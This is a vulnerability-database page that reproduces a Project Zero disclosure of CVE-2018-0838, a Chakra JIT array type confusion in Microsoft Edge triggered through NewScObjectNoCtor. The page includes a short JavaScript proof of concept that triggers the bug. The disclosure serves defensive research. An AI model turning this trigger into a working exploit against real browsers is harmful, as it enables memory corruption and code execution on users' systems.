Recent Vulnerabilities Research Posts Trends Blog About Contact

Related Vulnerabilities: CVE-2018-0838

Publish Date: 15 Feb 2018

Author: Google Security Research, lokihardt

Source

                							

                Microsoft Edge: Chakra: JIT: Array type confusion via NewScObjectNoCtor 

CVE-2018-0838


This is similar to the previous issues 1457, &lt;a href="/p/project-zero/issues/detail?id=1459" title="Microsoft Edge: Chakra: JIT: Array type confusion via Array.prototype.reverse" class="closed_ref" rel="nofollow"&gt; 1459 &lt;/a&gt;(MSRC 42551, MSRC 42552).

If a JavaScript function is used as a consturctor, it sets the new object's "__proto__" to its "prototype". The JIT compiler uses NewScObjectNoCtor instructions which are not checked by CheckJsArrayKills.

PoC:
function inlinee() {

}

function opt(arr) {
    arr[0] = 1.1;
    new inlinee();
    arr[0] = 2.3023e-320;
}

function main() {
    let arr = [1.1];
    for (let i = 0; i &lt; 10000; i++) {
        inlinee.prototype = {};
        opt(arr);
    }

    inlinee.prototype = arr;
    opt(arr);

    print(arr);
}

main();



This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available, the bug report will become
visible to the public.




Found by: lokihardt

<p>

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Twitter Reddit Linkedin Facebook

Microsoft Edge Chakra JIT NewScObjectNoCtor Array Type Confusion

Vulmon Search

About

Products

Connect